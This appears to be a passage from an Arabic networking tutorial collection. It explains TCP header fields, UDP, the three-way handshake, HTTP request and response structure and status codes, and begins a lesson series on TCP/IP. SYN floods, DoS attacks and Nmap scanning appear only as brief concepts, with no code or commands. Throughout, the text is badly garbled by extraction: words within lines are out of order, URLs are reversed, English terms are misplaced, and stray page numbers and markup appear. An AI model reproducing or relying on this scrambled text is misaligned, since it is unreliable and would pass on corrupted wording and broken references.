تستخدم من اجل التحكم في سیر البیانات، تحمل رقما Windowحقل = في ذاكرة تشیر الي كمیة البیانات التي يستطیع المسستقبل استقالبھا

المخصصة لالتصال الحالي وعندما يصل يستقبل معلومات تتم bufferالوسیطة المرسل ال يستطیع ارسال البیانات بشكل متواصل .. نقص ھذا الرقم بحجمھا

او بشكل اسرع مما يستطیع الطرف اآلخر معالجته ، ومن اجل حل ھذه لبیانات التي يستطیع بكمیة اWindowالمشكلة يقوم الطرف اآلخر بملء خانة

كلما يستلم الطرف اآلخر كمیة من البیانات يقوم ... معالجتھا في وقت واحد بشكل مناسب، حتي اذا ما صارت صفرا يجب windowبانقاص الرقم في حقل

علي المرسل التوقف لبرھة حتي يقوم المستقبل بمعاجلة البیانات ويفرغ ال Bufferثم يقوم بزيادة الرقم في حقل window بما يعني ان المستقبل جاھز

... الستقبال البیانات مرة اخري

التحقق وھذا رقم يتم حسابھا وفق خوارزمیة معینة وتنتج checksumحقل = تغییر في /رقما فريدا يمكن بھا التقق من صحة المعلومات الواردة او حدوث تلف

للبیانات Checksumتاجالطرف التي استلمت الرزمة تقوم باعادة ان... محتواھا الواردة في الترويسة، واذا كانت نفس االرقام تكون Checksumوتقارنھا مع

الرزمة سالمة واال تعبر تالفة وتترك،، ويتم طلب اعادة ارسال الرزمة مرة اخري ... >/FONT <

تشیر الي بداية بیانات التي اشیر الیھا كبیانات يجب Urgent Pointerحقل = االولوية في المعالجة ، وھذه البیانات توضع داخل القطعة ما بین اعطائھا

...URGالترويسة والبیانات العادية وھذا الحقل صحیح في حالة استخدام راية

فلنقل انك بدات في ارسال ملف ما إلي جھة ما،،

................................الملف.........................

،TCPالي القطع من قبل ثم تم تقطیعھا

.... .... .... .... .... .... .... .... .... .... .... .... ....

73

فسوف يكون الشكل الكامل ..... والبیانات TCP تمثل ترويسة Tاذا افترضنا ان للملف ھكذا

T .... T .... T .... T .... T .... T .... T....

ن االنترنت تتكون من شبكات مختلفات لماذا التقطیع الي رزم صغییرة؟؟ ال( التصمیم فبعض الشبكات قدرتھا علي المعالجة اقل من الشبكات االخري في

)الحجم للرزم

: يقوم بنوعین من الخدمة error control ،TCPعلي صعید التحقق من البیانات

ارسال الرزم المفقودة في الطريق ، واذا الرزمة فقدت ولم يستلم المرسل - 1 يقوم بارسال الرزمة مرة Time out من المستقبل خالل مدة معینة ACKجواب ..اخري

..CRCو ) chsecksumتستخدم حقل ( ارسال الرزم التي وصلت تالفة - 2 من المستقبل لمدة ACKالمرسل عندما يرسل رزمة ما تنتظر وصول جواب

بارسال رزمة معینة، وفي حالة اكتشاف المستقبل خطأ ما في الرزمة يقوم NOT ACK او ال يرسل حتي يحدث Time out فالمرسل يعید ارسال الرزمة الخ

..

User Datagram Protocolبروتوكول •

UPD 768 ذكرت بالتفصیل فيRFCأي ارسال ( تقدم اتصال عديم االتصال، تستخدم من قبل تطبیقات )TCPالبیانات ال تتطلب عملیة انشاء االتصال مثل

ارسال رزمة او رزمتین في خدماتھا او تستخدم من قبل خدمات التي ال تكتفي بمثل ( تتأثر بضیاع قلیل من البیانات وتقوم بارسال كمیة كبیرة جدا من البیانات

الي IP فقط تقوم باضافة رقم المنفذ وعنوان UDPو) تطبیقات فیديو ، صوت الخ بما ان SNMP و FSNمن التطبیقات التي تستخدم ھذا البروتوكول . المقطع

UDP عديمة االتصال فھي تعد غیر موثوق وال تضمن وصول البیانات الي وجھتھا .. وال تقدم طريقة للتحقق من ترتیب اجزاء البیانات

من أسباب إنشاء وتطوير ھذا البروتوكول أن إرسال البیانات عبره ال يتطلب اال ي علي إشارات تزامن او خیارات ال تحتوUDPالقلیل جدا من الوقت، اذ أن رزم

لذلك يعتبر سريع ... األفضلیة كما ال يراقب ھذا البروتوكول تسلسل أرقام الرزم

74

األداء ذو فعالیة كبیرة خاصة من الجل االتصاالت المخصصة للبث او الرسائل ) ...البث الشامل( العامة للشبكة

Destination | Source Port Port Checksum | Length

.................... Data

..UDP تشیر الي حجم مطقع Lengthحقل

: إنشاء االتصال واآلن نتعرف علبي المصافحة الثالثیة في==

المزود > -- --- -- -- - SYN رزمة تحمل رقم تسلسي وراية -- --- : 1الزبون

المزود 2:-- - حسن الیك رقمي التسلسي لرزمتي SYN/ACK ---- -- <الزبون

المزود> --- -- ACK لقد تلقیت رقمك يا مزود والیك رزمتي ---- - :3 الزبون

فذ عشوائي متوفر، رقم تسلسي في بداية انشاء االتصال الزبون يختار من

75

للرزمة التي ترسل طلبا النشاء االتصال، وترسل ذلك الرقم برزمة SINبدائي . SYN packet ولذك تعرف ھذه الرزمة برزمة SYNتححد فیھا راية

يعرف ان ھناك طلبا النشاء SYNمن جھة اخري المزود عندما يستلم ھذه رزمة SYN floodھجمات ( ذاكرتھا لتلك االتصال اتصال جديد، ويقوم بحجز جزء من

للزبون وعنوان االيبي ورقم المنفذ في جھة الزبون SIN، ويخزن فیھا ) ??وعندما تصل زرم جديدة بعدھا يتم البحث في ذاكرة عن رقم االيبي والمنفذ (

). للتعرف علي جزء الخاص من الذاكرة لتلك االتصال

ة، المزود تقوم بختیار رقم تسلسي الخاص الخطوة القادمة في عملیة المصافح ولذك SYN وراية ACKله للرزمة التي ترسل جوابا للزبون، ويقوم بتحديد راية

. ACK/SYNتسمي رزمة

( من المزود وبذلك تتأكد من ان المزود موجود ACK/SYNويستلم الزبون رزمة لتي أرسلھا الي اSINوبنفس الوقت تتأكد من رقم .. ) ? stealth scanعملیات

.. التي ارسلھا المزود SINالمزود ويقوم ايضا بحفظ رقم

تحمل ACKالخطوة األخیرة في المصافحة علي الزبون ات تقوم بارسال رزمة ACK/SYNوبھذا يتاكد المزود من أن الزبون تسلم رزمته ... الي المزود SINرقم

..

لیة المصافحة، بقي أن نقول وعمTCPواآلن بعدما استعرضنا ترويسة مقطع ( ھناك ھجمات حجب الخدمة ضد المواقع تستغل ھذه المعلومات

DRDoS,DDoS,DoS(للمزيد راجع موقع ستیف جبسون com.grc.www://http/ ، وھناك عملیات الكشف عن االنظمة التي تعمل علیھا جھاز بعید، وھناك

.... عن المنافذ، كلھا تستخدم ھذه المعلومات عملیات الفحص

الشھیرة، اول جیل ھجمات SYN Floodمثل ھجمات : في عملیات الھجوم التي استغلت عملیة المصافحة الثالث في DoSحجب الخدمة الموزعة

الھجوم، بحیث بعد الخطوة الثانیة يقطع العملیة وينشيء اتصال آخر ويكرر لدي المزود ويضعه في CPU لمخصصة او يستھلك جھدوھكذا يستھلك الموارد امعظم انظمة التشغیل أصلحت ھذه المشكلة بتعديل ( وضع خارج عن الخدمة

حديثا ھذا النوع من الھجوم مع وضع عنوان ايبي مزيف للرزم ) في المكدس للمزيد راجع مجلة.. مما يصعب عملیة التعقب

76

org.phrack.www://ttph/ وموقعcom.grc.www://http/ وھذان مقاالن ، و Id?asp.Details/forum/com.2000arabteam.www://http=137بالعربیة

18828=pid?pl.showpost/eBoards/bin-cgi/net.kwakeb.www://http

ھناك برامج فحص شھیرة OSFingerPrintفي عملیات الكشف عن االنظمة تعتمد في الكشف علي انشاء رزم بحقول ورايات معینة وثم تحلل Nmapمثل

الرزمة المستقبلة وبعد تحلیلھا تستطیع الكشف عن النظام في الطرف اآلخر ..ض الحقول والرايات في الرزمة المرسلة جوابا طبقا لبع

راية معینة /وغیرھا تعمد إلي إرسال رزم بحقل Nmapفي عملیات الفحص أيضا ثم تحلل الرزمة المرسلة جوابا وتكتشف ماذا كان منفذ ما مفتوحا، واما اذا كان

...null scan/Stealthالموقع الھدف حیا الخ من تلك االنواع

Nmapمراجعة ما كتبه صاحب ھاتین العملیتین يمكنكللتفصیل في

html.article-fingerprinting-nmap/nmap/com.insecure.www://http

أي استفسار او استزادة او مناقشة يمكنك ...وإلي اللقاء في الجزء القادم قسم أمن نظم المعلومات/com.2000arabteam.www://httpزيارتنا في

77

HTTPماھو


HTTP : البروتوكول االساسي لشبكة ويب العالمیة ..

تعتمد شبكة إنترنت في عملھا علي مجموعة من بروتوكوالت قیاسیة

ولم يكن ممكنا لشبكة إنترنت أو الي . تستخدمھا الحواسیب لتبادل البیانات أخري ان تنشأ من دون ھذه البروتوكوالت، وعلي الرغم من أن بروتوكول شبكة

IP/TCP يعتبر البروتوكول االساسي لشبكة إنترنت إال أن عملیات التحكم بكل وظیفة من الوظائف تتم عادة عن طريق بروتوكوالت تتوضع فوق بروتوكول

IP/TCPعر عادة بھذه ، وعندما تكون االمور سائرة علي ما يرام، فاننا ال نش جديدة، أو Toolsالبروتوكوالت، إال انھا تظھر امامنا باستمرار، عند تركیب أدوات

تنفیذ وظائف معینة، ويعتمد البريد االلكتروني علي البروتوكوالت البسیط لنقل News وتعمل قارئات االخبار POP، وعلي بروتوكول مركز البريد SMTPالبريد

Readersنقل االخبار عبر الشبكة عن طريق بروتوكول NNTP ويعتمد جلب ،، ويكمن جزء من سحر شبكة FTPالملفات عادة علي بروتوكول نقل الملفات

في انھا بیئة متعددة البروتوكوالت World(WWW Wide Weالويب العالمیة وخدمات FTP ومواقع Ghoperوھذا ما يمكننا من الوصول الي لوائح خدمة

... Web Browserخالل متصفحات شبكة ويب انترنت االخري، من

وعلي الرغم من أن شبكة الويب تسمح بالعديد من البروتوكوالت، اال انھا HTTP" بروتوكول نقل النص المتشعب"تحتوي علي بروتوكول اساسي يسمي

HyperText Transfer( Protocol . ( ويتحكم بروتوكولHTTP بعملیات استردات ، كما Browser التي تقوم بھا برامج المتصحفات Webالويب الوثائق علي شبكة

يتحكم بالتفاعالت التي تتم عبر شبكة ويب، من خالل مزايا معینة، مثل المعتمد كمواصفات 1.1، ولقد تم اعتماد االصدارة رقم Formsاالستمارات

nternet Engeneering (IETFقیاسیة من قبل فريق عمل ھندسة االنترنت Task ceFor ( بعد أن تبنتھا معظم المتصحفات الحديثة .

Hyperlink في عمله كلما نقرنا علي وصلة تشعبیة HTTPينطلق بروتوكول

78

) Uniform Resource Locator)URL" محدد مكان مورد المعلومات الموحد"يبدا وتوفر معظم . يبدا بھذه الرموز URL، او كلما كتبنا ://Httpفیھا بالرموز

Microsoft Internet Explorer و Netscape Navigatorات الحديثة مثل المتصحف التي URLعلیك عناء كتابة ھذه الروموز عن طريق اضافتھا آلیا الي عناوي

ويبدا ) . Ghoper او FTPباستثناء تلك التي تبدا عنواوينھا بالرموز ( تطلبھا رباعیة االجزاء، فور تشغیله بتنفیذ سسلة من العملیات، HTTPبروتوكول

، مرحلة الطلب )Connection(مرحلة الربط : ومؤلفة من المراحل التالیة )request( ومرحلة االستجابة ،)Response( ومرحلة الفصل ،)Disconnection( ،

منذ ظھورھا االول عام HTTPوقد توسعت مزايا بروتوكول ). Cloes(أو االغالق وتمكن معظم . تزال تشكل جوھر عملھا اال ان ھذه المراحل االربع ال1991

المتصحفات الحديثة من متابعة ھذه المراحل اثناء تنفیذھا عنن طريق مراقبة ) . Status Bar(شريط الحالة

يعتبر من البروتوكوالت التي تعتمد علي مبدا الطلب HTTPونظرا ألن بروتوكول

. ، النھاء عملیة التبادل Client وزبون serverواالستجابة فھو يتطلب وجود مزود وساھمت شبكة الويب في انتشار مفھوم المزود بحیث نشات إلفة بین معظم

ويمكن تعريف المزودات علي انھا . مستخدمي انترنت وبرمجیات مزود الويب ويعتبر . الذي يطلبھا clinetحواسیب تحتغظ بالمعلومات لتزود بھا الزبون

ا علي شبكة الويب الن مفھوم المتصفح اقل انتشارClinetمصطلح الزبون Browser وتعتبر متصفحات الويب زبائن بروتوكول . قد حل محلهHTTP تتالف ،

من البرمجیات التي ترسل الطلبات وتستقبل االستجابات، ويمكن ان ننظر الي مرسلة من قبل الزبون ASCII علي انھا رسالة آسكي HTTPتبادالت بروتوكول لرسالة من قبل المزود، ويمكن الفارق بین رسالة الطلب واستجابة لتلك ا

.... واالستجابة في مضمون الرسالة بحد ذاته

: مرحلة الرط ومرحلة الفصل بشكل سريع HTTPاالولي واالخیرة، من تبادالت : سوف نعرض الي مرحلتین

ي يسعConnectionنظرا النھا اقل المراحل االربع تشويقا، ففي مرحلة الربط ، وينظر )الحاسوب البعید ( الي اقامة عالقة ربط مع المزود ) المتصفح( الزبون

IP(او الي رقم بروتوكول انترنت ) Domain Name(الزبون الي اسم النطاق Number ( محدد مكان مورد المعلومات الموحد"الموجود ضمن مستطیل "URL

رقم Portن يستخدم البوابة اHTTPسعیا لالتصال مع المزود، ويحاول بروتوكول ما عدا في الحاالت التي يشیر ( علي المزود، التمام عملیة مرحلة الربط 80

اما عن مرحلة الفصل او االغالق فتتم في نھاية ) . الي بوابة اخري URLفیھا

79

، وتبدا ھذه العملیة بايعاز من الزبون، فور االنتھاء من نقل الملف HTTPتبادالت ، أو اذا Stopبايعاز من الزبون اذا نفذ المزود المستخد امر الوقوف المعني، أو

عن طريق الضغط علي نص تشعبي جديد، او HTTPنفذ تبادال جديدا من نوع في المتفصح، او اذا Forward أو التقدم Backاذا استخدم احد ازرار التراجع

ويتطلب . صفح انتقي موضوعا جديدا من قائمة المواقع السابقة، في ھذا المتكل واحد من الموضوعات التي تظھر علي صفحة الويب عملیة ربط مستقلة

تتضمن نوعا من الربط المتواصل 11HTTP.اال ان االصدارة . لتبدا بنقل المعلوماتPersistent connection البقاء حیا" يسمي "Keep Alive يمكنه جلب ملفات

. ملیة ربط واحدة فقط من خالل ع) مثل ملفات الرسومات( متعددة

: مرحلة الطلب تبدا مرحلة الطلب فور انتھاء مرحلة الربط، ويقوم الزبون في ھذه المرحلة

الي المزود عن طريق ارسال رسالة اسكي باسطر requestبتقديم طلبه request lineوحقول معینة وتحتوي الرسالة في أعالھا ، علي سطر الطلب

وترويسة Genereal Headerالترويسة العامة : ترويسات متبوعا بثالثة سطور لل، ويقصد بالكائن Entity Header وترويسة الكائن Request Headerالطلب

المعلومات او الملفات التي ترغب في ارسالھا من متصفحك الي الحاسوب المزود، ويجد علي السطر التالي الترويسة االخیرة حقل يسمي جسم الكائن

..... ، وسنلقي فیما يلي نظرة علي كل سطر وحقل BodyEntityاو

عددا من HTTP في رسالة بروتوكول Request Lineيضم سطر الطلب ، ومعرف مكان مورد المعلومات Methodالتفصیالت، بما فیھا الطريقة المتعبة

ونلقي قبل . واصدارة البروتوكول ) Uniform Resource(URI Identifierالموحد يتالف . يث عن الطريقة المتعبة، نظرة سريعة علي التفصیالت االخري الحد

محدد مكان مورد " عادة اما من URIمعرف مكان مورد المعلومات الموحد URN" اسم مكان مورد المعلومات الوحد" او من URL" المعلومات الموحد

)Uniform Resource Name( وتكمن مھمته في االشارة الي ملف او مورد ، اخري، من موارد الشبكة، اما اصدارة البروتوكول فھي كما يتضح من اسمھا،

ويحتوي الطلب بعد ھذه المواصفات علي نوع . المطلوب HTTPتحدد بروتوكول والتفصیالت االخري ووفیما Modifiesrsمن الرسائل، يتضمن مختلف المعدالت

: يلي توضیح بسیط

REQUEST SYNTAX الصیغة >METHOD<>URL<".11/HTTP ">crlf <

80

>}Header<:>Value><crlf{< * >crlf <

EXMAPLE المثال .11/htm HTTP.index/GET

plain/text: Accept plain/text: Accept

Accept */* : Browser: Agent-User

تحديد الطريقة المتبعة، اكثر الطرق HTTPيتضمن سطر الطلب في بروتوكول

وفیما تتضمن الطرق . Post وطريقة Head و طريقة Getيقة انتشارا ھي طر االكثر انتشارا علي Get، وتتالف طريقة Delete وطريقة Putاالخري طريقة

وحیث . االطالق من تعلیمة تطلب من المزود ارسال وثیقة او كائن الي الزبون ارسل لي الملف الموجود عند " فان متصحف الويب يقول Getاستخدام طلب

، ويمكن " المعن، بحیث استطیع عرض محتوياته علي المستخدمURLنوان ع باستخدام عبارات شرطیة لطلب الملفات التي لھا تاريخ Getتعديل طريقة

معین، او عدلت بتاريخ معین، او تقع ضمن فئة ما، اما المحتويات نفسھا فھي عن Get من الطلب، ويتمثل اختالف طريقة Entity Bodyمحددة في حقل

كل شيء الي الزبون Headيرسل المزود في طريقة : فیما يليHeadطريقة ، او بشكل ابسط فھو يرسل معلومات عن الملف Entity Bodyباستثناء حقل

لتحديد فیما اذا كان الربط Headولیس الملف ذاته، ويمكن استخدام طريقة يث العالمات المتشعب شرعیا ام ال، ونشیر ھنا الي ان برنامج تتبع تحد

Head، تعتبر مثاال علي البرامج التي تستخدم طلبات Bookmarksالمرجعیة ....

باطراد علي شبكة الويب، واذا سبق لك ان أنشات Postيزداد استخدام طريقة

، الن ھذه الطريقة تحدد Post، فانك تعرف حكما طريقة HTML Formsاستمارات بشكل Postوتطلب طريقة . االستماراتماذا يحدث للمعلومات المسلمة عبر

URIاساسي من المزود ان يقبل المعلومات المرفقة، كمعلومات مضافة معرفة ، علي سبیل المثال، لوضع رسالة او تعلیق ضمن Postمعین، وتستخدم طريقة

مساحات علي المزود تخصصھا بعض مواقع الويب لھذا الغرض، والضافة اما ما . الرسال البیانات من استمارة ويب الي المزودمعلومات لقواعد البیانات، و

يحدث لتلك البیانات فیعتمد علي المزود ذاته، حیث يمكن ان ترسل الي قاعدة

81

، أو يمكن ان تضاف CGI Commom Getway Interfaceبیانات من خالل نص ، لیتمكن األخرون من HTMLعلي ھیئة محددة بشكل مسبق الي وثیقة

. HTTPان ھذا االمر ال يدخل في نطاق تبادالت بروتوكول مشاھدتھا، اال

، فھي تطلب من المزود تخزين Post مشابھة لطريقة Putتعتبر طريقة في الطلب، URIمسمي من قبل معرف ) كمورد( المعلومات المرفقة كملف

واذا كان ھذا الملف غیر منشا، ينشئ المزود ملفا جديدا، اما اذا كان الملف Postويكمن الفارق الرئیسي بین طريقة . یكتب علیه من جديد منشأ، ف يقوم بتسمیة المورد الذي Post في طريقة URI في أن معرف Putوطريقة

اما ما يحدث لھا بعد ذلك . HTTPسوف يھتم بالبیانات الموجودة في رسالة ا، فیحدده المزود، وقد يؤدي ھذا االمر، في الواقع الي تعديل مورد مختلف كلی

علي URI فإن معرف Put ، اما في طريقة URIعن المورد الذي يحدده معرف عكس ما ذكرنا، يشیر الي المعلومات المرفقة، ولیس علي مورد علي المزود،

.. وال يمكن للمزود ان يفعل شیئا بالمعلومات سوي تخزينھا

ضا، والسبب اسھل ھاتین الطريقتین، إال انھا اقل استخداما ايPutتعتبر طريقة ھو ان المشرفین علي المزودات يرغبون السباب مفھومة في التحكم بوجھة

للسبب ذاته، بشكل قلیل نسبیا باستثناء Deleteتستخدم طريقة . المعلومات من المزود ان Deleteوتطلب طريقة . استخدامات المشرفین علي المزودات

غیر المفضل ان ، لكن من URIيتخلص من المورد المحدد في سطر معرف تسمح بانجاز ھذا العمل الخطر عم طريق بضع نقرات علي الوصالت المتشعبة،

. ولھذا السبب يتم اعداد المزودات بحیث تسمح باستخدام طرق معینة فقط HTTP من رسالة بروتوكول Request Lineقد تحتوي اسطر ترويسة الطلب نوع الوسط، مثل eptAccوتحدد ترويسة . علي عدة حقول مختلفة مختلفة

ملفات الفیديو والصوت الذي يمكن ان يحتويه االستجابة، علي حین أن حقل Encoding-Accept يحدد ان مجموعة الرموز المقبولة أو تقنیات الترمیز المقبولة

التفويضات Autorization headerوتغطي ترويسة التفويض . لالستجابة Control -Casheما تحتوي ترويسة فی. المسموحة بین المتصفح والمزود

header علي زمرة معقدة من موجھات Directivesالكاش . بشكل مكثف مع التحكم بالكاش والذي اصبح 11HTTP.ويتعامل بروتوكول

وتوجد . مجاال ھاما في تصمیم وادارة شبكة الويب، خالل السنة الماضیة لمحتويات والتواريخ ترويسات اخري تسمح لتحديد مواصفات الموقع ونوع ا

وتفصیالت تعديل المورد، وتفصیالت عن البروكسي وحتي معلومات حول ومن المتوقع ان يزداد دور ھذه . الذي يقوم بالطلب Agent-Userالمتصفح

82

الترويسات بشكل اكبر مع ازدياد تعقیدات شبكة الويب وزيادة تنوع التبادالت ... من االوساط والمزايا الداخلیة، وتكامل مختلف االنواع الجديدة

:االستجابة

بعد ان ينتھي المتصفح من انشاء الربط مع المزود، وارسال طلبه ينتظر رسالة االستجابة وتتالف رسالة االستجابة كما ھو الحال في رسالة الطلب من عدة

، متبوعا status lineسطور من المعلومات ويقع في بدايتھا سطر الوضعیة وعة من ترويسات االستجابة ثم بالوثیقة او المورد المطلوب بمجموعة متن

وتستغرق االستجابة في معظم االحیان، زمنا اطول لتنفیذھا بالمقارنة مع زمن الطلب، وذلك بسبب احتوائھا علي الملف او المورد المطلوب،، ويعتبر ھذا االمر

لبات اآلن ھي طHTTP ولكن معظم رسائل Put و Postمعكوسا في طلبات Getبسیطة جدا ...

، وشیفرة الوضعیة HTTPيحتوي سطر الوضعیة من االستجابة علي رقم إصدارة

من مؤشرات ثالثیة status codesوعبارة االستجابة، وتتالف شیفیرات الوضعیة االرقام تدل علي الطريقة التي تم فیھا معالجة الطلب، لكن عبارة السبب

Reason Phraseعلي شرح للشیفرة قصیرة، وتحتوي Code باللغة االنجلیزية ، ... ويوجد خمسة تصنیفات لشیفرات الوضعیة . العادية

1xx وتخصص لتفصايل المعلومات 2xx وتشیر الي نجاح العملیة 3xx وتعلمنا بانتھاء نقل معرف ال URI 4xx وتیشر الي خطأ من جانب المتصفح 5xx وتوضح أن المزود يعاني من مشاكل .. .

التي تعني ممنوع 403وال بد اننا شاھدنا بعضا من ھذه الشیفرات مثل وتشیر الشیفرات االخري الي عدم . التي تعني غیر شرعي 401الوصول، و

، والي عدم دعم 503، والي عدم توفر الخدمة 405سماح بطريقة طلب معینة اشرة لمعالجة وتعتبر شیفرة الوضعیة في الواقع استجابة مب.. الخ 415الوسط

200معلومات الطلب، ولكن أكثر شیفرات الوضعیة انتشارا ھي غیر مرئیة، ھي ، اال ان المتصفح ال يعرضھا بل يعرض عوضا عنھا الملف المطلوب OKتعني

الذي قام بجلبھا ، وفیما يلي شیفرة استجابة بسیطة اوال الصیغة

RESONSE SYNTAX ".01/HTTP ">code-result<]>sagemes<[>crlf <

83

>}Header<:>Value><crlf< * >crlf <

EXAMLE المثال OK.1 200 1/HTTP .10/MDMA:Server .01:Version-MIME

html/text: type-Content :33 1999:257 00Thu Jul :modified-Last

2003:Length-Content >title<Multithreaded Daemon for Multimedia Access-MDMA> /title < .. المحتويات االخري للملف .. ]Connection cloes by foruign host [

كما ھو الحال في رسالة الطلب، فان رسالة االستجابة يمكنھا ان تحتوي علي حقول ترويسات، وتبلغ ھذه الحقول برمجیات الزبون، بالطرق المسموحة،

ة المحتويات، وطول المحتويات، مثل لغ( وتزودنا بمعلومات عن محتويات الرسالة وتساعد ھذه ... ، وتعطي تفاصیل عن تواريخ التعديالت الخ )ونوع المحتويات

الترويسة المتصفح بتفسیر الملف او المورد بشكل صحیح، بحیث يتمكن ... المتصفح من عرضھا بشكل صحیح

:HTTPالمزيد من ، لتغطیة تبادالت HTTPل يضاف بشكل دائم المزيد من الخیارات الي بروتوكو

مثال آلیا تسمح HTTP-Secureوالشؤون االمنیة، فیضیف , CGIمثل نصوص لمزيد من المعلومات انظر في الموقع ( بالتوقیع الرقمي والمزايا االمنیة االخري

-cgi/8000.net.commerce.wwwtxt.shttp/drafts/standards/information/?texit/bin

االساسي مع ازدياد الحاجة HTTPاالضافة علي بروتوكول وستستمر عملیات W 3الي تبادالت اكثر تعقیدا، ومن المفید ان نلقي نظرة علي موقع

org.3w.Organization Web www لمعرفة آخر التطورات في ھذا المجال ... HTTP الخاص ببرتوكول 2616 رقم RFCوالي وثیقة

html.2616rfc/net.rfc://http

84

)الجزء االول (IP/TCP توكول برو

USA&AgainstISR :للكاتب

IP / TCPتعريـــف عـام بال

:الدرس محتويات tcp ipما ھو ال - 1 tcp ipممیزات ال -2 اصل االنترنت-3 tcp ipمیالد ال -4 tcp ip اھداف تصمیم ال- 5 حركة البیانات عبر الشبكة -6 tcp ipلماذا نستخدم ال -7

الدرس االول IP / TCPبال تعريف عام

يتصلوا ببعضھم عملیا عندما يوافقوا علي استخدام يمكن الثنان من البشر انالفرنسیة او اي لغة ,االسبانیة ,االنجلیزية , العربیة يمكن ان يتحدثوا. لغة محددة

. اللغة يستخدموا نفساخري ولكن يجب ان . Transmission Control Protocolاجھزة الكمبیوتر تعمل بنفس الطريقة

) IP/TCP(Internet Protocol / يمثل لغة تتحدث بھا . ھو اختصار المصطلح . الكمبیوتر اجھزة

IP / TCPمع ھو مجموعة من القواعد التي تعرف كیف يتراسل اي كمبیوتران . البیانات مع بعضھمابعضھما ويتراسالن

. مجموعة القواعد ھذه تسمي ال بروتوكول او Protocol suite مجموعة البروتوكوالت التي جمعت مع بعضھا البعض تشكل

Protocol stack ويعملون سويا فیما يسمي Protocol stack او حزمة البروتوكول .

85

IP / TCP ويعتبر, ابلة للتطور الق,السريعة , يعتبر من البروتوكوالت القوية

. مجموعة كفء من البروتوكوالتاالنترنت الشائع المستعمل ھذه ھي بروتوكول Protocol stackحزمة البروتوكول

. االنكثیر من االفراد والشركات , نسبة الن تبادل المعلومات اصبح اكثر اتساعا

TCP IP .سیحتاجون الي فھم ال

IP / TCP:ماھو ال

IP /TCPالبروتوكوالت التي تمكن الكمبیوترات من االتصال و مجموعة منھ . تحتاج الكمبیوترات الي ان تتصل ببعضھا ال توجد في الحالة العادية وعندما ال

. علیھا بین االجھزة حوجة نھائیا الي بروتوكوالت متفقالي برتوكوالت ولكن عندما تتصل الكمبیوترات ببعضھا في شبكة تظھر الحوجة

. فق علیھايتاكثر من بروتوكول ولكن يستطیع الیوم مدير اي شبكة كمبیوترات ان يختار من

ببساطة ان جزء من السبب ھو. ھو االكثر استخداما IP / TCPبروتوكول الاذا اردت INTERNET .ھو الذي تستعمله اكبر شبكة في العالم ال TCP IPال IP / TCP.يتصل جھازك مع االنترنت يجب ان تستخدم ال ان

البروتوكوالت مع بعضھا فان المجموعة بشكل عندما تعمل مجموعة من Potocol Suite OR Protocol Stack .جماعي تعرف ب

وصف ل مجموعة من Protocol Suite )مثال ل حزمة البروتوكول اوIP / TCPال . ( البروتوكوالت التي تعمل مع بعضھا

وكال Protocol Stack اوl suite ProtocoمصطلحIP / TCPيطلق عليانھما المصطلحین يستخدمان بصورة متبادلة اي يعطیان نفس المعني رغم

. يختلفان بعض الشئ . كمبیوتر في العالم ھو انه يتوافق تقريبا مع اي TCP IP سبب اخر ل شھرة ال

IP stack / TCPوانظمة تشغیل مدعوم من كل اصدارات انظمة التشغیل الكبري : 2000Windows , Windows NT , 98\95Windows ,شبكات وتشملال.Netware ,Unix , Linux , 2003Windows , Windows XP

IP / TCPتسمي ايضا لغة االنترنت .

86

. وھي ايضا لغة لكثیر من الشبكات الصغیرةاالنترنت لكي تتصل بفاعلیة يجب ان يتفقوا كل الكمبیوترات التي يلحق بھا

حتي يستطیع الناس الذين مثلھا مثل اي لغة بشر لھا قواعد . علي لغة . يشتركون في المحادثة ان يفھوا ماذا يقول االخرون

الكمبیوتر تحتاج الي مجموعة من القواعد حتي تستطیع الكمبیوترات ان لغةوبعض قواعد اللغة التي تستخدمھا الكمبیوترات لالتصال . تتصل بفاعلیة

. البیانات ومتي يتم استقبالھا م ارسالتشتمل علي متي يت TCP IP : ممیزات ال-1

IP /TCPعاما 20 مستخدم الكثر من . IP /TCP وسندرس في ھذا القسم اكثرھا. له كثیر من الممیزات والفوائد

. اھمیة : قابلیة التشغیل المتبادل -1

یة وقبول شعب يكتسبIP suite / TCPواحد من اكبر االسباب التي جعلت ال . عالمي ھو انه يمكن تركیبه واستعماله بصورة عملیة علي اي نظام تشغیل

ان يتصل ويرسل البیانات الي خادم Unix يستطیع خادمIP / TCPباستخدامDOS خادم او.Windows

. الخادم ھو اسم اخر للكمبیوتر او الجھاز علي الشبكة . لتطبیقات المختلفةالغي التضارب في اIP / TCPنقول ان ويمكن ان

: المرونة -2

IP /TCPفي الدروس القادمة سنعرف بعض الممیزات , بروتوكول مرن جدا كتلة . التي ادت الي ھذه المرونة

Administrator يتضمن ازالة المشقة التي يواجھھا المديرIP / TCPمثال لمرونة

Addresses .في تخصیص واعادة تخصیص العناوين : ة الحركة سھول-3

البروتوكوالت ھي صعوبة نقل البیانات من احد قطاعات واحدة من قیود اكثر

87

. الشبكة الي قطاع اخرIP stack /TCP مصمم بصورة استثنائیة لینقل البیانات من اي قطاع في الشبكة

او من اي خادم في شبكة في جزء من العالم الي اي خادم الي القطاع االخر . العالم كان اخر مناخر في شبكة في م

88

)الجزء الثاني (IP/TCP بروتوكول


ھذا الدرس يھدف بصفة خاصة الي التركیز علي نقطة ھامة وھي ان يستوعب الذي يدرسه وما حقیقته وھو اساس الدارس ما

علیھا موضوع الدراسة حتي ن الدروس علي اساس افكار مسبقة قاممھم لتكو

ما يجي واحد يقول في النھاية ماھي قصة ال

IP /TCP ولماذا جاءت وھیك اسئلة وھي مرحب بھا ايضا ولكن لعامل الزمن .. وھذا تمھید للدخول الي الدرس الدسم .. نحب نتجاوزھا مسبقا

.. التوفیق كمارجو ل.. والشغل الثقیل قااادم

: اصل االنترنت -3

وكثیر من IP / TCPامام تطور فھم جذور واساسیات االنترنت سیفتح بصیرتك . قواعده ومعايیره

يمكننا بسھولة ان نفھم ال, وكیف تطور IP / TCP ,اذا عرفنا لماذا انشئ ال.IP protocol suite /TCP

وية انشئت بواسطة وكالة وھي شبكة ق ARPAnet ,ھو اصل انترنت الیوم – Advanced Research Projects Agency - - ابحاث المشاريع المتطورة

لوزارة الدفاع االمیركیة وھي تابعة . 1969واطلقت في العام ) ARPA (اختصارا .1950وتم انشاءھا في نھاية

مسئولة بصفة خاصة عن التھديد المحتمل من انشئت ھذه الشبكة لتكون .السوفییتي م النووي من قبل االتحادالھجو

االساسیة ھي انشاء شبكة اساسیة تسمح لقادة ARPA واحدة من اھداف . القوات االمیركیة بان يبقوا علي اتصال دائم في حالة وقوع الحرب النووية

